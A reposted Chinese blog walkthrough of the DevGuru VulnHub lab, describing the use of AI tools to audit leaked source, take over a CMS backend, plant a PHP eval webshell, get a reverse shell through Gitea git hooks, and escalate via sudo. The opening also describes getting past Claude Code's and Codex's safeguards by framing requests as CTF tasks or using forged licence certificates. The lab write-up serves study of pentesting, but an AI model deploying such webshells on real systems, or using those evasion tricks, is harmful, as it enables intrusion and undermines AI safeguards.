文章总结: 本文分享作者将AI工具(TraeCN、Qclaw)结合传统渗透测试方法的经验,以DevGuru靶场为例演示实战流程。通过代码审计获取数据库凭证,利用自然语言提问定位后台及敏感信息;通过修改用户权限和上传webshell获取初始访问;结合GTFOBins知识实现sudo提权获取root权限。文章强调AI辅助工具能显著提升效率,并推荐VulnPlus等新兴平台。 综合评分: 78 文章分类: 渗透测试,漏洞分析,实战经验,AI安全,安全工具
Trae CN、Qclaw在渗透测试中的利用(免费工具)
原创
吃瓜安全 吃瓜安全
吃瓜安全
2026年4月17日 20:39 山东
在小说阅读器读本章
去阅读
零基础转行网安快三年了,最近AI发展的势头很猛, 各种安全产品迭代速度越来越快, 感觉自己还有很多旧的知识没学会就又出了很多新东西, 像Claude Code、Codex 确实NB, 可以通过CTF转换、伪造许可证书等方式突破道德限制进行逆向、渗透等工作, 并且也相当高效,唯一的坏处很多好用的外国模型需要付费并且还稍微有点小贵, 虽然可以从闲鱼上买到账号但是不太稳定, 并且现在Claude对中国区的用户限制也越来越严, 听说最近还要用户手持证件拍照, 所以现在除了可以用国内的GLM5、MiniMax等模型平替以外,还有一些免费工具可以作为辅助, 虽然比不上付费模型吧,但是相比传统手工渗透效率提升依然很明显, 正好我最近正在努力把以前学的知识和AI相结合, 这篇文章就是我复习小迪安全中sudo提权时整理的笔记,简单修改后分享给大家,下面直接进入正题。
sudo提权靶场devguru练习
#
环境:https://www.vulnhub.com/entry/devguru-1,620/
这个靶场前期就是目录扫描扫到一个.git目录,然后可以通过githack把源码下载到本地,文章就从代码审计这里开始说。
https://github.com/yunmengya/PHP_AUDIT_SKILLS
这个是我最近看到的一个比较好用的PHP代码审计skill这边给trae和qclaw都安装了这个skill
运行skill 进行代码审计, 除了一些漏洞以外也会有一些敏感的配置文件
这里可以通过自然语言提问的方式直接找到后台登录地址
http://192.168.0.12/backend 后台首页(未登录会跳转登录页)http://192.168.0.12/backend/auth/signin 登录页面
通过自然语言提问, 找到数据库信息以及数据库的登录地址
http://192.168.0.12/adminer.php
项目 值
主机 localhost:3306
数据库 octoberdb
用户名 october
密码 SQ66EBYx4GT3byXH
用户表 backend_users
登录成功
sql语法
SELECT login, password FROM backend_users;
查到密码是 $2y$10$bp5wBfbAN6lMYT27pJMomOGutDF2RKZKYZITAupZ3x8eAaYgN6EKK
无法解密密码加密了,但可以编辑密码、修改密码、创建密码
创建账户test1/test1 登录
发现test1权限不高,问一下trae哪个字段负责用户的权限
修改保存以后,出现一个新菜单栏
可以通过该功能点上传webshell
输入
function onStart(){
//蚁剑连接
@eval($_POST["pass"]);
}
这里蚁剑连的上,哥斯拉连不上
备份文件又找到gitea账号密码
把这个文件下载到本地,将路径丢给龙虾,让它帮你找可以利用的信息
又是这个环节 修改密码
frank/Test!@34
改成这个登不上
这里用bcrypt加密以后再做修改
https://www.bejson.com/encrypt/bcrpyt_encode/
按照bcrypt加密 改密码为123456
$2a$10$g1WS1DsTK.cAtsDVpxPyeOUT.k/QdgUVyfE/LK3cFqXXfPhgUexn2
利用gitea GitHooks拿权限
开启监听
随便改一个代码就会触发反弹shell
点击提交
成功收到反弹shell,这里需要提权
小龙虾方便的地方就在于生成skill和调用skil都方便,这里可以直接将
GTFOBins(https://gtfobins.org/) 这个项目地址丢给他,让它自己去学,后面微调一下就很准确了(有利于减轻大模型的幻觉,防止它胡说八道) 
直接输入sudo -l 把返回的值丢给他
通过sudo提权,成功拿到root权限
最后再次感叹一下AI发展的速度, 前几天作者申请试用了一下安h的vulnplus(https://vulnplus.dasctf.com/dashboard.html), 不得不说真的NB, 感觉这次hw真要0day大爆发了, 一会儿再试一下MoneyScan去~
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:吃瓜安全 吃瓜安全 吃瓜安全《Trae CN、Qclaw在渗透测试中的利用(免费工具)》
版权声明
本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。
评论